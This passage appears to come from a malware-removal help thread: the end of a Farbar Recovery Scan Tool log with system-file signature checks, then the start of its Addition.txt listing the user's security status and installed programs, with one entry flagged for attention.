C:\Users\Rod\AppData\Local\Temp\msvcr90.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-16 00:33

==================== End Of Log ============================

Here's the data from Addition.txt:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014
Ran by Rod at 2014-10-17 15:15:18
Running from E:\Documents
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKCU\...\uTorrent) (Version: 3.4.2.34309 - BitTorrent Inc.)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.10 - Adobe Systems)
Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{A922C4B7-50E0-4787-A94C-59DBF3C65DBE}) (Version: 3.0 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{FE86CB0C-FCB3-4358-B4B0-B0A41E33B3DD}) (Version: 7.1.0.32 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cisco WebEx Meetings (HKCU\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Citrix Online Launcher (HKLM-x32\...\{75B8A55E-0762-4676-AAC0-6FDF025B034B}) (Version: 1.0.220 - Citrix)
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{650DE870-ECA3-4E63-8D77-778512BE5D4C}) (Version:  - Microsoft)
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{650DE870-ECA3-4E63-8D77-778512BE5D4C}) (Version:  - Microsoft)
FileZilla Client 3.8.1 (HKLM-x32\...\FileZilla Client) (Version: 3.8.1 - Tim Kosse)
Firefox Packages (HKCU\...\Firefox Packages) (Version:  - ) <==== ATTENTION
Google Apps Migration For Microsoft Outlook® 3.0.19.44 (HKLM-x32\...\{16CA4BD4-27ED-4DA0-9190-48F69D8AAC25}) (Version: 3.0.19.44 - Google, Inc.)
Google Apps Sync™ for Microsoft Outlook® 3.5.380.1010 (HKLM-x32\...\{DE0A6BFF-9531-4681-BCDD-884B84AB2F89}) (Version: 3.5.380.1010 - Google, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.104 - Google Inc.)
Google Drive (HKLM-x32\...\{C6640705-7479-4EE5-BC86-879F05F65E74}) (Version: 1.17.7290.4094 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
iCloud (HKLM\...\{81E20D41-C277-4526-934D-F2380AF91B78}) (Version: 3.1.0.40 - Apple Inc.)
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
iTunes (HKLM\...\{0D924CB2-2EA4-4044-BAF7-770202D6BD0D}) (Version: 11.1.4.62 - Apple Inc.)
join.me (HKCU\...\JoinMe) (Version: 1.14.0.132 - LogMeIn, Inc.)
LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version:  - LastPass)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Business 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office InfoPath MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft OneDrive (HKCU\...\OneDriveSetup.exe) (Version: 17.0.4035.0328 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package - SE (x64) (HKLM\...\Microsoft Visual J# 2.0 Redistributable Package - SE (x64)) (Version:  - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package - SE (x64) (Version: 2.0.50728 - Microsoft Corporation) Hidden
mIRC (HKLM-x32\...\mIRC) (Version: 7.32 - mIRC Co. Ltd.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyFreeCodec (HKCU\...\MyFreeCodec) (Version:  - )
NVIDIA 3D Vision Driver 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.65 - NVIDIA Corporation)
NVIDIA Control Panel 331.65 (Version: 331.65 - NVIDIA Corporation) Hidden
NVIDIA Graphics Driver 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.26.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.26.4 - NVIDIA Corporation)
NVIDIA Install Application (Version: 2.1002.133.889 - NVIDIA Corporation) Hidden
NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.13.3165 - NVIDIA Corporation) Hidden
NVIDIA Update 1.15.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.15.2 - NVIDIA Corporation)
NVIDIA Update Components (Version: 1.15.2 - NVIDIA Corporation) Hidden
Plex Media Server (HKLM-x32\...\{9eb61479-6f2f-43c4-bfe8-12a7ea9d1acb}) (Version: 0.9.914 - Plex, Inc.)
Plex Media Server (x32 Version: 0.9.914 - Plex, Inc.) Hidden
PowerISO (HKLM-x32\...\PowerISO) (Version: 4.7 - PowerISO Computing, Inc.)
PS3 Media Server (HKLM-x32\...\PS3 Media Server) (Version: 1.90.1 - PS3 Media Server)
Quicken 2012 (HKLM-x32\...\{0A1E0BDA-5E8F-436d-8BE5-7E97C5CB899D}) (Version: 21.1.7.18 - Intuit)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{17528CE4-C333-48FB-A9E4-D841E795CDCE}) (Version: 3.0.23.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 3.0.23.0 - Renesas Electronics Corporation) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.2.14014_7 - Samsung Electronics Co., Ltd.)
Samsung Kies (x32 Version: 2.6.2.14014_7 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.14072.12 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.14072.12 - Samsung Electronics Co., Ltd.) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.45.0 - SAMSUNG Electronics Co., Ltd.)
ScanSnap (x32 Version: 5.1.30.19 - PFU Limited) Hidden
ScanSnap (x32 Version: 5.1.62.2 - PFU Limited) Hidden
ScanSnap Manager (HKLM-x32\...\{DBCDB997-EEEB-4BE9-BAFF-26B4094DBDE6}) (Version: V5.1L62 - PFU)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (x32 Version:  - Microsoft) Hidden
SharePort Plus (HKLM\...\SharePort Plus) (Version: 4.3.0 - D-Link Corporation)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
Snagit 9.1 (HKLM-x32\...\{0E6ED660-498C-42F7-9EF4-FB0C96DFC01A}) (Version: 9.1.0.206 - TechSmith Corporation)
Sonos Controller (HKLM-x32\...\{7BBA9BF8-05DF-47D8-8880-82A9B99505B9}) (Version: 27.2.81200 - Sonos, Inc.)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.28223 - TeamViewer)
TextPad 4.7 (HKLM-x32\...\{B510A987-487E-4C66-9F4F-D386AC275715}) (Version: 4.7.2 - Helios)
TotalExcelConverter (HKLM-x32\...\Total Excel Converter_is1) (Version: 3.5 - Softplicity, Inc.)
TotalHTMLConverter (HKLM-x32\...\Total HTML Converter_is1) (Version: 2.5 - Softplicity, Inc.)
TotalMovieConverter (HKLM-x32\...\Total Movie Converter_is1) (Version:  - Softplicity, Inc.)
TotalOutlookConverter (HKLM-x32\...\Total Outlook Converter_is1) (Version: 2.1 - Softplicity, Inc.)
TotalOutlookConverterPro (HKLM-x32\...\Total Outlook Converter Pro_is1) (Version:  - Softplicity, Inc.)
True Image 2013 (HKLM-x32\...\{ADAEEC53-24AF-4A49-B872-75FCBDA59916}Visible) (Version: 16.0.5551 - Acronis)
True Image 2013 (x32 Version: 16.0.5551 - Acronis) Hidden
True Image 2013 Plus Pack (HKLM-x32\...\{516200E0-2043-4603-B9E7-CD87B71B6DF4}) (Version: 16.0.5551 - Acronis)
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version:  - Microsoft)
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2889836) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{9179FC17-97A8-4D98-9E09-05720AF5D44E}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2889836) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9179FC17-97A8-4D98-9E09-05720AF5D44E}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817396) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{39767ECA-1731-45DB-AB5B-6BF40E151D66}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{BA610006-2C39-4419-9834-CF61AB24810A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUS_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version:  - Microsoft)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
VMware vSphere Client 4.1 (HKLM-x32\...\{A0B433B1-941D-46F5-AE59-286263534232}) (Version: 4.1.0.12319 - VMware, Inc.)
VMware vSphere Client 5.0 (HKLM-x32\...\{04805AB6-F757-496A-8D56-37A0FC5FF6F3}) (Version: 5.0.0.29542 - VMware, Inc.)
VMware vSphere Client 5.5 (HKLM-x32\...\{4CFB0494-2E96-4631-8364-538E2AA91324}) (Version: 5.5.0.4216 - VMware, Inc.)
